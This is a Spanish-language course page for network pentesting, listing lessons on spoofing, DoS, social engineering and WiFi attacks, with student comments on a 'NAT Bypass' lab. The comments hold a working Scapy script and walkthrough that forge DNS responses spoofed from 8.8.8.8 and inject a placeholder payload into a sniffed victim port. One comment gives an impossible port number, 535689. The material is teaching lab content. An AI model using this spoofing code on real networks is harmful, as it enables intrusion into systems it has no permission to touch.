El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.
Introducción al pentesting a redes
Bienvenida y presentación de la estructura del curso
Laboratorios para el curso
Modelo de ataques
Direccionamiento dinámico
Protocolos de enrutamiento dinámico
Configuración de protocolos de enrutamiento dinámico
Configuración de enrutamiento dinámico
Configuración de segundo enrutador y verificación de tablas de enrutamiento
Configuración de NAT y redireccionamiento
Análisis de DNS
Ataques a protocolos de red
ARP Poisoning
DNS Spoofing
DHCP Spoofing
Encapsulado de paquetes con Scapy
Ataques a protocolos de enrutamiento
Verificación de ataques a protocolos de enrutamiento
Análisis de NAT
Ataque NAT Bypass
Ataques de ingeniería social
Introducción a la Ingeniería Social
Credential Harvesting
Preparación de ataques con SET y Metasploit
Ejecución de ataques con SET y Metasploit
Ataques de denegación de servicio
Modelo de un ataque DoS
Ataques ICMP y SYN Flood
Ataques Smurf y DoS con Metasploit
Ataques con LOIC
Pentesting con DoS
Ataques a redes inalámbricas
Configuración de entorno para auditoría WiFi
Monitoreo de redes WiFi
Ataque a WEP
Ataque a WPA
Conclusiones, creación de informe y bibliografía
Elaboración de informe
Despedida, bibliografía y cierre
No tienes acceso a esta clase
¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera
Convierte tus certificados en títulos universitarios en USA
Antes: $249
Paga en 4 cuotas sin intereses
Termina en:
Juan Pablo Caro
Aportes 10
Preguntas 1
El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.
Con el siguiente script se puede automatizar un poco el proceso:
#!/usr/bin/python3
from scapy.all import sniff, UDP, Ether, IP, sendp
port = 0
def print_summary(pkt):
global port
if pkt[UDP].sport != None:
port=pkt[UDP].sport
while port == 0:
packets = sniff(filter="dst host 8.8.8.8 and dst port 53 and src host 192.168.120.1 and udp", count=1, iface="eth0", timeout=1, prn=print_summary)
a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1")
c = UDP(sport=53, dport=port)
d = r"Malicious payload"
packet = a/b/c/d
sendp(packet, loop=1, inter=3, iface="eth0")
en casi de que raw no te funciona
d = r"Esto podira ser codigo malicioso"
esto es por la versión que usa python
El ataque de NATBypass, nos permite aprovecharnos de una vulnerabilidad de este protocolo para, como su nombre lo indica, saltarnoslo y poder generar una conexión directa con el equipo a través de un puerto dado. El cual se deberá conocer a través de un comando que mencionaremos más adelante.
El primer paso es crear el paquete falso con Scapy:
a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1") //src es la red que estamos falsificando y dst es la ip pública
c= UDP(sport=53,dport=44576) //dport es el puerto de la víctima.
d = raw(bytes_encode("Aqui va el codigo malicioso"))
packet =a/b/c/d
Pero debemos ser rápidos si queremos que el ataque funcione, por lo que, una vez armado el paquete, ejecutamos el comando en nuestra máquina de ubuntu que nos permite conocer el puerto al que enviaremos la solicitud falsificaa.
echo "Mensaje" | nc -vun 8.8.8.8 53
↓ ↓ ↓
-Usa -verbose -Puerto
Netcat -UDP DNS
-No DNS
Inverso
Luego, en mi máquina atacante, reviso Wireshark en los registros DNS, valido el puerto en el protocolo UPD y lo añado al siguiente comando en sapy:
packet[UDP].dport= 535689 → puerto obtenido
sendp(packet,loop=1,inter=3,iface="eth0")
Se aprende muhco en cada clase.
Wow que interesante la manera de usar nat
Muy interesante la herramienta Scapy 🐍
Lo de raw me funciono con:
d = "Codigo malicioso"
Me quedó la duda, en que lenguaje debe estar escrito el código malicioso se puede insertar en el raw?
¿Quieres ver más aportes, preguntas y respuestas de la comunidad?